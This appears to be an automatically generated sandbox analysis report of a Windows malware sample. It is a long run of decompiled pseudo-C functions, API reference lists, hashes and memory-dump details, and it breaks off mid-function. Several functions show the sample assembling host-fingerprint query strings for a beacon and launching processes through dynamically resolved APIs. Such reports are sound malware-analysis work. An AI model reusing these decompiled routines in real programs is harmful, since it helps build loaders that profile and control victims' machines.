                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EB4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EC7
                                                                                                                                  • int.LIBCPMT ref: 6E906ED4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EE4
                                                                                                                                  • int.LIBCPMT ref: 6E906EF1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F01
                                                                                                                                  • int.LIBCPMT ref: 6E906F0E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F1E
                                                                                                                                  • int.LIBCPMT ref: 6E906CDF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • int.LIBCPMT ref: 6E906D42
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D6C
                                                                                                                                  • int.LIBCPMT ref: 6E906D97
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DC5
                                                                                                                                  • int.LIBCPMT ref: 6E906DD2
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DF9
                                                                                                                                  • int.LIBCPMT ref: 6E906E06
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906E56
                                                                                                                                  • int.LIBCPMT ref: 6E906E63
                                                                                                                                  • int.LIBCPMT ref: 6E906F36
                                                                                                                                  • numpunct.LIBCPMT ref: 6E906F5D
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F6D
                                                                                                                                  • int.LIBCPMT ref: 6E906F7A
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FB1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FC4
                                                                                                                                  • int.LIBCPMT ref: 6E906FD1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2009638416-0
                                                                                                                                  • Opcode ID: 5195ae5fe1ba27b78dce64a43bb060e5bbb0142ffaecce9ce4d23e93c20746c1
                                                                                                                                  • Instruction ID: 82ef8fcf1f7143299f74a75ee5823f1482c64c909b969f933c8b51682a3cdcb0
                                                                                                                                  • Opcode Fuzzy Hash: 5195ae5fe1ba27b78dce64a43bb060e5bbb0142ffaecce9ce4d23e93c20746c1
                                                                                                                                  • Instruction Fuzzy Hash: A591E971D14311AFEB205FF98C556BF7AAC9FA2794F404C1CE844AB681EB74C941CBA2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A36109, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 244memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E00A36109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0xa3d018; // 0x53709a90
				asm("bswap eax");
				_t61 =  *0xa3d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0xa3d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0xa3d00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0xa3d2e0; // 0x296a5a8
				_t3 = _t64 + 0xa3e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0xa3d02c,  *0xa3d004, _t59);
				_t67 = E00A35B60();
				_t68 =  *0xa3d2e0; // 0x296a5a8
				_t4 = _t68 + 0xa3e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71;
				_t72 = E00A31BBF(_t134);
				_t133 = __imp__; // 0x74e05520
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0xa3d2e0; // 0x296a5a8
					_t7 = _t126 + 0xa3e8cc; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0xa3d270, 0, _v8);
				}
				_t73 = E00A3137A();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0xa3d2e0; // 0x296a5a8
					_t11 = _t121 + 0xa3e8d4; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0xa3d270, 0, _v8);
				}
				_t146 =  *0xa3d364; // 0x33a95b0
				_t75 = E00A33857(0xa3d00a, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0xa3d270, _t152, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0xa3d270, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0xa3d270, _t152, _v20);
						goto L26;
					}
					E00A3A811(GetTickCount());
					_t82 =  *0xa3d364; // 0x33a95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0xa3d364; // 0x33a95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0xa3d364; // 0x33a95b0
					_t148 = E00A31974(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0xa3d270, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0xa3c2ac);
					_push(_t148);
					_t94 = E00A338CA();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0xa3d270, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E00A31922( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E00A347D5();
						L22:
						HeapFree( *0xa3d270, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E00A3365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_v12 = E00A33273(_t157, _a4, _a8, _a12);
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E00A34AAB(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E00A38FB2(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E00A34AAB(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                                                                                                  0x00a36109
                                                                                                                                  0x00a36109
                                                                                                                                  0x00a36109
                                                                                                                                  0x00a36112
                                                                                                                                  0x00a3611b
                                                                                                                                  0x00a3611d
                                                                                                                                  0x00a3611d
                                                                                                                                  0x00a3612a
                                                                                                                                  0x00a36135
                                                                                                                                  0x00a36138
                                                                                                                                  0x00a3613d
                                                                                                                                  0x00a36146
                                                                                                                                  0x00a36149
                                                                                                                                  0x00a3614e
                                                                                                                                  0x00a36151
                                                                                                                                  0x00a36156
                                                                                                                                  0x00a36159
                                                                                                                                  0x00a36165
                                                                                                                                  0x00a36172
                                                                                                                                  0x00a36174
                                                                                                                                  0x00a3617a
                                                                                                                                  0x00a3617f
                                                                                                                                  0x00a3618a
                                                                                                                                  0x00a3618c
                                                                                                                                  0x00a3618f
                                                                                                                                  0x00a36191
                                                                                                                                  0x00a36196
                                                                                                                                  0x00a3619c
                                                                                                                                  0x00a361a1
                                                                                                                                  0x00a361a4
                                                                                                                                  0x00a361a9
                                                                                                                                  0x00a361b6
                                                                                                                                  0x00a361b8
                                                                                                                                  0x00a361be
                                                                                                                                  0x00a361c8
                                                                                                                                  0x00a361c8
                                                                                                                                  0x00a361ca
                                                                                                                                  0x00a361cf
                                                                                                                                  0x00a361d4
                                                                                                                                  0x00a361d7
                                                                                                                                  0x00a361dc
                                                                                                                                  0x00a361e9
                                                                                                                                  0x00a361eb
                                                                                                                                  0x00a361f9
                                                                                                                                  0x00a361f9
                                                                                                                                  0x00a361fb
                                                                                                                                  0x00a36209
                                                                                                                                  0x00a3620e
                                                                                                                                  0x00a36210
                                                                                                                                  0x00a36215
                                                                                                                                  0x00a363d6
                                                                                                                                  0x00a363e0
                                                                                                                                  0x00a363e9
                                                                                                                                  0x00a3621b
                                                                                                                                  0x00a36227
                                                                                                                                  0x00a3622d
                                                                                                                                  0x00a36232
                                                                                                                                  0x00a363ca
                                                                                                                                  0x00a363d4
                                                                                                                                  0x00000000
                                                                                                                                  0x00a363d4
                                                                                                                                  0x00a3623e
                                                                                                                                  0x00a36243
                                                                                                                                  0x00a3624c
                                                                                                                                  0x00a3625d
                                                                                                                                  0x00a36261
                                                                                                                                  0x00a3626a
                                                                                                                                  0x00a36270
                                                                                                                                  0x00a3627f
                                                                                                                                  0x00a36286
                                                                                                                                  0x00a3628f
                                                                                                                                  0x00a36295
                                                                                                                                  0x00a363be
                                                                                                                                  0x00a363c8
                                                                                                                                  0x00000000
                                                                                                                                  0x00a363c8
                                                                                                                                  0x00a362a1
                                                                                                                                  0x00a362a7
                                                                                                                                  0x00a362a8
                                                                                                                                  0x00a362ad
                                                                                                                                  0x00a362b2
                                                                                                                                  0x00a363b4
                                                                                                                                  0x00a363bc
                                                                                                                                  0x00000000
                                                                                                                                  0x00a363bc
                                                                                                                                  0x00a362bb
                                                                                                                                  0x00a362c2
                                                                                                                                  0x00a362ca
                                                                                                                                  0x00a362cf
                                                                                                                                  0x00a362d8
                                                                                                                                  0x00a362e3
                                                                                                                                  0x00a362e8
                                                                                                                                  0x00a362ed
                                                                                                                                  0x00a363ec
                                                                                                                                  0x00a363a0
                                                                                                                                  0x00a363a0
                                                                                                                                  0x00a363a5
                                                                                                                                  0x00a363b0
                                                                                                                                  0x00a363b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00a363b2
                                                                                                                                  0x00a362f7
                                                                                                                                  0x00a362fc
                                                                                                                                  0x00a36301
                                                                                                                                  0x00a36306
                                                                                                                                  0x00a36316
                                                                                                                                  0x00a36319
                                                                                                                                  0x00a3631f
                                                                                                                                  0x00a36325
                                                                                                                                  0x00a3632b
                                                                                                                                  0x00a3632e
                                                                                                                                  0x00a36334
                                                                                                                                  0x00a36337
                                                                                                                                  0x00a3633c
                                                                                                                                  0x00a36340
                                                                                                                                  0x00a36340
                                                                                                                                  0x00a3634c
                                                                                                                                  0x00a36358
                                                                                                                                  0x00a3635c
                                                                                                                                  0x00a3635e
                                                                                                                                  0x00a36363
                                                                                                                                  0x00a36365
                                                                                                                                  0x00a3636a
                                                                                                                                  0x00a3636f
                                                                                                                                  0x00a3637c
                                                                                                                                  0x00a36384
                                                                                                                                  0x00a36387
                                                                                                                                  0x00a36387
                                                                                                                                  0x00a36363
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3634e
                                                                                                                                  0x00a36352
                                                                                                                                  0x00a36389
                                                                                                                                  0x00a3638c
                                                                                                                                  0x00a36395
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a36395
                                                                                                                                  0x00a36354
                                                                                                                                  0x00000000
                                                                                                                                  0x00a36354
                                                                                                                                  0x00a3634c

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A3611D
                                                                                                                                  • wsprintfA.USER32 ref: 00A3616D
                                                                                                                                  • wsprintfA.USER32 ref: 00A3618A
                                                                                                                                  • wsprintfA.USER32 ref: 00A361B6
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A361C8
                                                                                                                                  • wsprintfA.USER32 ref: 00A361E9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A361F9
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A36227
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A36238
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A3624C
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A3626A
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00A34653,?,033A95B0), ref: 00A3199F
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(?,?,?,00A34653,?,033A95B0), ref: 00A319A7
                                                                                                                                    • Part of subcall function 00A31974: strcpy.NTDLL ref: 00A319BE
                                                                                                                                    • Part of subcall function 00A31974: lstrcat.KERNEL32(00000000,?), ref: 00A319C9
                                                                                                                                    • Part of subcall function 00A31974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A319E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,00A3C2AC,?,033A95B0), ref: 00A362A1
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(033A9B10,00000000,00000000,7691C740,00A3467E,00000000), ref: 00A338DA
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(?), ref: 00A338E2
                                                                                                                                    • Part of subcall function 00A338CA: lstrcpy.KERNEL32(00000000,033A9B10), ref: 00A338F6
                                                                                                                                    • Part of subcall function 00A338CA: lstrcat.KERNEL32(00000000,?), ref: 00A33901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00A362C2
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00A362CA
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00A362D8
                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00A362DE
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                  • wcstombs.NTDLL ref: 00A3636F
                                                                                                                                    • Part of subcall function 00A33273: SysAllocString.OLEAUT32(?), ref: 00A332AE
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 00A363B0
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A363BC
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,033A95B0), ref: 00A363C8
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A363D4
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00A363E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3748877296-8415677
                                                                                                                                  • Opcode ID: b358c58b032997962b0ef477687aaff8b91858e478c9bc42666717714980866e
                                                                                                                                  • Instruction ID: f3bf4cfa818d6f313c2660cb678590f3588d2d44a009e0af77e9c9281572c0f2
                                                                                                                                  • Opcode Fuzzy Hash: b358c58b032997962b0ef477687aaff8b91858e478c9bc42666717714980866e
                                                                                                                                  • Instruction Fuzzy Hash: B3912671900208EFDB11DFA8ED89AAE7BB9FF09350F144065F405EB261DB31E952DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E93B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 6E93B2E8
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA15
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA27
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA39
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA4B
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA5D
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA6F
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA81
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CA93
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAA5
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAB7
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAC9
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CADB
                                                                                                                                    • Part of subcall function 6E93C9F8: _free.LIBCMT ref: 6E93CAED
                                                                                                                                  • _free.LIBCMT ref: 6E93B2DD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93B2FF
                                                                                                                                  • _free.LIBCMT ref: 6E93B314
                                                                                                                                  • _free.LIBCMT ref: 6E93B31F
                                                                                                                                  • _free.LIBCMT ref: 6E93B341
                                                                                                                                  • _free.LIBCMT ref: 6E93B354
                                                                                                                                  • _free.LIBCMT ref: 6E93B362
                                                                                                                                  • _free.LIBCMT ref: 6E93B36D
                                                                                                                                  • _free.LIBCMT ref: 6E93B3A5
                                                                                                                                  • _free.LIBCMT ref: 6E93B3AC
                                                                                                                                  • _free.LIBCMT ref: 6E93B3C9
                                                                                                                                  • _free.LIBCMT ref: 6E93B3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction ID: eb78d8570a4bbdc9c95a2e08f4bf35dd40646a14c0041922e4eb7bc93e1da6a4
                                                                                                                                  • Opcode Fuzzy Hash: 36c439e65503281ff56caf0f362879e1a684c89655b705a5ebc98305c565c78b
                                                                                                                                  • Instruction Fuzzy Hash: FB317E31605A219FEB609BB9E844BDAB3FCAF51354F744819E454D6269EF30EC54CF10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A31000, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E00A31000(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E00A34837(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E00A3A938( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0xa3d298 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0xa3d2e0; // 0x296a5a8
					_t18 = _t47 + 0xa3e3b3; // 0x73797325
					_t68 = E00A32291(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0xa3d2e0; // 0x296a5a8
						_t19 = _t50 + 0xa3e760; // 0x33a8d08
						_t20 = _t50 + 0xa3e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E00A334C7();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E00A334C7();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xa3d270, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E00A34AAB(_t70);
				goto L12;
			}


















                                                                                                                                  0x00a31008
                                                                                                                                  0x00a31008
                                                                                                                                  0x00a31017
                                                                                                                                  0x00a3101e
                                                                                                                                  0x00a31023
                                                                                                                                  0x00a31130
                                                                                                                                  0x00a31137
                                                                                                                                  0x00a31137
                                                                                                                                  0x00a31032
                                                                                                                                  0x00a3103a
                                                                                                                                  0x00a3103d
                                                                                                                                  0x00a31042
                                                                                                                                  0x00a31057
                                                                                                                                  0x00a3105d
                                                                                                                                  0x00a3105e
                                                                                                                                  0x00a31061
                                                                                                                                  0x00a31067
                                                                                                                                  0x00a3106a
                                                                                                                                  0x00a3106f
                                                                                                                                  0x00a31077
                                                                                                                                  0x00a31083
                                                                                                                                  0x00a31087
                                                                                                                                  0x00a31117
                                                                                                                                  0x00a3108d
                                                                                                                                  0x00a3108d
                                                                                                                                  0x00a31092
                                                                                                                                  0x00a31099
                                                                                                                                  0x00a310ad
                                                                                                                                  0x00a310b1
                                                                                                                                  0x00a31100
                                                                                                                                  0x00a310b3
                                                                                                                                  0x00a310b4
                                                                                                                                  0x00a310bb
                                                                                                                                  0x00a310d4
                                                                                                                                  0x00a310d6
                                                                                                                                  0x00a310da
                                                                                                                                  0x00a310e1
                                                                                                                                  0x00a310fb
                                                                                                                                  0x00a310e3
                                                                                                                                  0x00a310ec
                                                                                                                                  0x00a310f1
                                                                                                                                  0x00a310f1
                                                                                                                                  0x00a310e1
                                                                                                                                  0x00a3110f
                                                                                                                                  0x00a3110f
                                                                                                                                  0x00a31087
                                                                                                                                  0x00a3111e
                                                                                                                                  0x00a31127
                                                                                                                                  0x00a3112b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A34837: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A3101C,?,00000001,?,?,00000000,00000000), ref: 00A3485C
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A3487E
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A34894
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A348AA
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A348C0
                                                                                                                                    • Part of subcall function 00A34837: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A348D6
                                                                                                                                  • memset.NTDLL ref: 00A3106A
                                                                                                                                    • Part of subcall function 00A32291: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A31083,73797325), ref: 00A322A2
                                                                                                                                    • Part of subcall function 00A32291: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A322BC
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,033A8D08,73797325), ref: 00A310A0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00A310A7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A3110F
                                                                                                                                    • Part of subcall function 00A334C7: GetProcAddress.KERNEL32(36776F57,00A35B13), ref: 00A334E2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 00A310EC
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A310F1
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00A310F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3075724336-969920318
                                                                                                                                  • Opcode ID: 8ea00891eb63904856405a56b79c96a79c3b74cecc45da32176b078d0dcde587
                                                                                                                                  • Instruction ID: be62e6b62ff3e03af1829461bf5433892607631d79d8a4ef2c9fe2f9c29f0026
                                                                                                                                  • Opcode Fuzzy Hash: 8ea00891eb63904856405a56b79c96a79c3b74cecc45da32176b078d0dcde587
                                                                                                                                  • Instruction Fuzzy Hash: 58313CB6800208EFDB21EFE4DD89EDEBBBCEB08354F104569F645A7161D630AE55CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A35F64, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 27%
                                                                                                                                  			E00A35F64(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
